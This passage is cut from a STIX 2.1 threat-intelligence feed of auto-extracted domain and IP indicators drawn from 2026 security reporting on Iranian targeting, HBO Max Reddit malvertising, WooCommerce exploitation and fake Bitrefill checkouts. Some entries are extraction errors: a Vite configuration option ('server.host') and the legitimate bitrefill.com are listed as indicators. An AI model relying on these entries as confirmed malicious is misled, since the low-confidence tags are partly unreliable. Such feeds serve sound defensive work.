News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e657bec7-3952-41c8-951f-a0c09618e406","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: api.telegram.org","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ing in logging unexpectedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io ip","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f5f5c2b-7265-4304-b2a6-d81b08a5e30a","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: backblazeb2.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ctedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightnin","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60f18e5c-51e8-4038-bcc2-2810e6f1aa78","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: iproyal.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: [.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is fo","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fc58139-b58b-4187-bad0-ffea83807a29","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: lightningproxies.net","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: zeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is for the user/victim to be","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9baab2ea-b474-49b1-b2cd-086027ff635f","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: storjshare.io","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: : api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--328ccd33-5719-4f54-8603-20491b33ae5a","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: vultrobjects.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: nvestigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Miti","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9037ff0a-56ad-4a1f-a7a2-2ebd9d2dc3b8","created":"2026-09-15T11:51:03.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ember-bridge.com","description":"Seen in \"HBO Max’s verified Reddit account hijacked to spread malware\" (Malwarebytes Labs). Context: lution with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate y","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T11:51:03.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/news/2026/09/hbo-maxs-verified-reddit-account-hijacked-to-spread-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34603111-8ddf-40c4-bc93-99f75b493a29","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,600 blocked exploit requests IP address 104.194.9.138 Observed source of more than 6,100 blocked exploit requests","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05678410-2f80-478f-a75c-9e06399e8a57","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 114.10.43.203","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 470 blocked exploit requests IP address 114.10.43.203 Observed source of more than 310 blocked exploit requests I","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--17c8e20b-697a-492f-9b13-77f6aa4c0347","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,100 blocked exploit requests IP address 187.75.114.36 Observed source of more than 470 blocked exploit requests I","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90e6c29c-513b-4aaf-b36a-d05bdbd39ea7","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 9,100 blocked exploit requests IP address 23.137.105.214 Observed source of more than 6,700 blocked exploit requests","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2150c894-3741-4e2c-812c-bfebd98abfe2","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,700 blocked exploit requests IP address 23.180.120.140 Observed source of more than 6,600 blocked exploit requests","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe96387d-128b-4480-b76a-d8a79d602ce7","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 24,900 blocked exploit requests IP address 31.59.129.150 Observed source of more than 24,000 blocked exploit request","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bad68de3-4eb5-49f1-8843-32bec0347663","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 37.114.144.209","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 310 blocked exploit requests IP address 37.114.144.209 Observed source of more than 310 blocked exploit requests F","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b839989d-482b-403c-b9ca-d2afffedcdbb","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 16,000 blocked exploit requests IP address 92.241.13.140 Observed source of more than 9,100 blocked exploit requests","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8276bb83-f740-40d2-9481-fd23854add73","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 92.241.13.213 Observed source of more than 24,900 blocked exploit request","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9394e6de-8493-4757-8319-604b1a0b70ba","created":"2026-09-15T11:12:32.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: server.host","description":"Seen in \"Mass-Scanning Campaign Exploits Vite Flaw to Extract Cloud Credentials From Exposed Dev Servers\" (The Hacker News). Context: exposes the Vite dev server to the network using --host or server.host config option The sensitive file exists in the allowed dire","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-15T11:12:32.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/mass-scanning-campaign-exploits-vite.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df1c3e04-c3b7-473d-aa72-71e3d1e8b003","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clean-disk-guide.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: oke down into 15 ads for a fake macOS disk utility at apple.clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. O","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c3e7864e-3499-4159-864e-c9c93182152b","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: code-desktop.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: .clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. One entry point into a larger system The HBO Max ads wer","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4cec5e29-1a07-49c7-b4d3-e1e619db7f41","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-craft.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: -macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craft[.]com. The rest broke down into 15 ads for a fake macOS disk ut","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--983bfd90-91fd-4bd9-89be-50d557ed0474","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomax-macos.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: s, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craf","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c54e560-0869-47a5-bb0a-68c26fe06d4e","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.app","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: id . Of the 108 ads, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex,","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--528539f7-3cdc-452f-92ce-cf67a4364c35","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: HBO Max subreddits,” wrote the user. Clicking the ad led to hbomaxx[.]us, “which looks somewhat legitimate, and has a join button","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b09cfd07-69da-4779-8e94-9ed63a0c40dd","created":"2026-09-15T09:09:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"Hacked HBO Max Reddit Account Used for Malware Delivery via ClickFix Attack\" (SecurityWeek). Context: ich does not exist. Clicking the malicious ads led users to hbomaxx[.]us, a page mimicking the official HBO Max site that also con","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T09:09:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/hacked-hbo-reddit-account-used-for-malware-delivery-via-clickfix-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83df7e8b-75c5-4602-8823-b7a88cd3bb56","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: biterflll.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y tips in seconds. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com b","pattern":"[domain-name:value = 'biterflll.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f258e998-e938-427e-835a-9c9b25fb145c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: s. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.","pattern":"[domain-name:value = 'bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91d54374-f428-4a12-b09b-611ff68d7b94","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrefall.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: f compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.","pattern":"[domain-name:value = 'bitrefall.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf588d26-9d84-4482-829a-08e06dee5827","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ed or charged back. Confirm that the main domain is exactly bitrefill.com before approving a payment. Be wary of domains containing a","pattern":"[domain-name:value = 'bitrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35013b29-9bd2-4f44-9f83-2e1418862940","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrefill-payments.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: Cs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitr","pattern":"[domain-name:value = 'bitrefill-payments.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de205e4f-3076-43fe-a4c8-8f0990f0ac35","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrefill-pays.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[","pattern":"[domain-name:value = 'bitrefill-pays.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6b78d40-1a57-421c-92eb-2adb255f22b6","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitregift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[","pattern":"[domain-name:value = 'bitregift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--50848362-5b60-470e-bceb-08551994e7c3","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[","pattern":"[domain-name:value = 'bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--abac8e8d-add5-4087-8501-2dd64fbcc0ac","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitretill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: [.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[","pattern":"[domain-name:value = 'bitretill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da346f7d-d8cd-4038-8b75-ba8a2fbf11fd","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: -pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill","pattern":"[domain-name:value = 'bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15a014b1-b4e2-4b28-9787-ec68fbd5567c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitre","pattern":"[domain-name:value = 'bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1569fd25-b12e-46c9-81db-5bbdf86a7ff7","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bitrnfill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-b","pattern":"[domain-name:value = 'bitrnfill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--47401d25-cfd4-45b3-a8a4-640b52645175","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 